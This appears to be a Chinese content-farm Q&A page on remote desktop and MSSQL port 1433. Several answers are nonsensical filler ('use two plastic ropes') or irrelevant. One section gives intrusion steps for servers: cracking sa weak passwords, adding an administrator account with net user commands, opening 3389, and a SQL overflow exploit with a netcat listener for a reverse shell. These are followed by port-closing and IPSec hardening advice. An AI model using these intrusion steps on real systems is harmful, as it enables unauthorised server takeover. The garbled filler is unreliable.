(3389弱口令)不用通过3389弱口令也能连接远程桌面的方法

励志句子
评论 2023-07-20 13:28:29 浏览
一、肉鸡是什么啊??

1、用两根塑料的绳子。

二、怎样才能实现远程桌面连接?对方不同意能不能执行远程桌面?

1、用两根塑料的绳子。

三、开始运行那里可以运行那些

1、用两根塑料的绳子。

四、怎样登陆

1、用两根塑料的绳子。

五、如何做好服务器安全维护?

1、Win+E键,打开“文件资源管理器”,点击左侧的“此电脑”。

六、网络上的“肉鸡“是什么意思啊?

1、Win+E键,打开“文件资源管理器”,点击左侧的“此电脑”。

七、1433端口入侵及防范方法【为了梦想而努力吧】

1、  是给远程管理MSSQL用的。

2、扫到了开放1433端口的主机用X-SCAN扫出了sa空口令主机用SQLTools连上了该用什么命令得到主机权限    扫描到sql弱口令了,用sqltools连接之后,你可以直接用以下命令在对方电脑上加入一个管理员账户!netuser用户名密码/add回车netlocalgroupadministrators用户名/add回车然后接着用那个sqltools上传一个开3389的程序!让其在对方电脑上自动运行!然后用终端登录器登录试试!一般登录器xp系统本身就有!当然你也可以像楼上说的那样!直接将guest账户激活,提升权限为管理员!。

3、scanport.exe查有1433的机器SQLScanPass.exe进行字典暴破(字典是关键)后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello溢出漏洞入侵。

4、nc-vv-l-p本机端口sqlhelloF.exe入侵ip1433本机ip本机端口(以上反向的,测试成功)sqlhelloz.exe入侵ip1433(这个是正向连接)久违的溢出工具用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢、143389。

5、可并没有报告说发现有弱口令,看来网管还算比较有责任心。

6、但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的大的“木马”。

7、通过观察,我发现只有在1433端口上下点工夫,想想办法。

8、何不用SQL2溢出工具试试?先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat-l-p99”,监听本地99端口。

9、接着该SQL2出马了。

10、再打开一个cmd窗口,键入“sql221*.*1*.*0”,其中21*.*是对方IP,1*.*是我自己的IP,回车后提示packagesentsuccessful。

11、再回过头去看看监听本地端口的netcat,已经变成了C、WinNTsystem32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

12、。

13、关闭你的1433端口(MSSQL的1433端口)-附各种关闭端口方法MSSQL的1433端口,是给远程管理MSSQL用的,如果你的服务器无需用到1433端口,或者你只在服务器上直接管理,那么就把这个端口关掉吧,这个属于高危端口,很多黑客都是直接通过这个入侵。

14、方法有四种、简单的是在网卡TCP/IP协议的属性--高级--(TCP/IP筛选)里设置。

15、方法是、(设置)--(网络和拨号连接),右击(本地连接)--(属性)--TCP/IP协议--(属性)--(高级)--(选项)--(TCP/IP筛选)--(属性),在这里就可以设置端口的打开关闭。

16、但这里要吗就“全部允许”,要吗就“只允许”。

17、要把常用的端口都添加,否则,缺了那些端口,那些连网功能就没了,注意噢如果你是远程管理的服务器记得一定要把你的远程桌面端口,默认是3389添加进去,不然点确定后就断开了,只能叫机房人员帮你了。

18、使用IPSEC安全策略(这个方法麻烦一点)、IPSEC安全策略被誉为是WIN2000自带的‘防火墙’,不过它的RULE(规则)不是很直观罢了。

19、每一个RULE由两部分组成,“条件”与“行为”,思路是、当满足某个“条件”时就执行某个“行为”。

20、建立一个RULE一共需要四个步骤、(1)建立“条件”、(2)建立“行为”、(3)建立策略(RULE)群,把“条件”与“行为”连起来)、(4)击活策略。

21、(1)建立RULE(规则)示例,以端口445/TCP为例、打开(本地安全策略)--右击“IP安全策略,在本地机器”--“管理IP筛选器表和筛选器操作”--“管理IP筛选器列表”--“添加”。

22、随便写个“名称”和“描述”,方便自己记忆就行,什么都可以,例如写“禁止TCP445”。

23、然后“下一步”--“添加”--“下一步”--“源地址”选“任何IP地址”,“下一步”--“目标地址”选“自己的IP地址”,“下一步”--“选择协议类型”,选‘TCP’,“下一步”--选择“从任意端口”“到此端口”。

24、“到此端口”栏填“445”,“下一步”--“完成”(把“编辑属性”栏钩上再按“完成”。

25、在跳出的窗口中,可以选择是否“镜象”,此选项会把此规则用到源地址与目标地址相反的条件上去)。

26、这样,就完成了建立“条件”的工作了。

27、(2)回到上面的第三步“管理IP筛选器表和筛选器操作”--“管理筛选器操作”--“添加”--“下一步”--添写“名称”和“描述”,例如写“阻止”,“下一步”--选择“阻止”,“下一步”--“完成”(这里也有‘编辑属性’,不过没什么用的,建议不要选)。

28、建立“行为”完成了。

29、(3)建立RULE、回到“本地安全策略”--右击“IP安全策略,在本地机器”--“创建IP安全策略”--“下一步”--填写“名称”和“描述”,例如写上“我的防火墙”,“下一步”--取消“击活默认响应规则”选项的勾选,“下一步”--钩上“编辑属性”,“完成”。

30、--在跳出的属性窗体中的“规则”栏中,点击“添加”--“下一步”--‘下一步’--‘下一步’--到“身份验证方法”中,您可以选择使用WINDOWS2000默认值(第一项)、也可以选择使用自己定义的字符串(第三项)。

31、“下一步”--出现一个列表,在里面选择原来建立的“禁止TCP445”,“下一步”--到选择“行为”了,选择原来建立好的“阻止”,“下一步”--“完成”。

32、按“确定”,关闭属性窗口。

33、如果还要建立其他的RULE,可以双击原来建立好的“我的防火墙”策略,然后“添加”,重复上面的操作步骤就可以建立其他RULE。

34、(4)击活策略、在“本地安全策略”--点击“IP安全策略,在本地机器”->在右面的窗口,右击“我的防火墙”--点击“指派”就激活了。

35、此方法较为可靠,在不阻碍用户正常使用的情况下又可以阻止黑客的入侵。

36、只是操作有点麻烦。

37、实验所知、使用IPSEC安全策略与TCP/IP端口筛选可以禁止其他IP访问特定的端口或协议等,但不能停止端口的监听。

38、所以如果使用netstat命令或ACTIVEPORTS查看时仍能看到这些端口在监听,不过在其他IP的机子的确访问不到这些端口。

39、但如果您用环回地址(0.1)就会有异常现象出现,不过不用担心,其他的IP是无法访问到的。

40、在服务进程里,关闭一些系统不用的,可能存在危险的服务。

41、关闭了那些服务,就连同关闭了它对应的端口。

42、通过安装的第三方防火墙来关闭端口。

43、你在IDC干过,靠别叫别人干坏事哦/。

八、远程桌面连接快的方法

1、安装一款远程控制软件,推荐使用网络人远程桌面控制软件,内含控制端跟被控制端,控制端安装在主控机,被控端安装在需要桌面远程连接的电脑。。

2、控制端跟被控制端新注册账号,很快不泄露隐私。。

3、需要远程桌面连接帮助的电脑登录控制端,帮助者在控制端登录。

4、控制放可以在控制端系统设置,按需要勾选,提高控制速度跟稳定性。

5、勾选被控机,在点开屏幕控制,就可以进行桌面连接。

6、软件还具有文件共享功能,视频通讯功能,远程开关机功能,可以满足各种远程桌面连接的需要。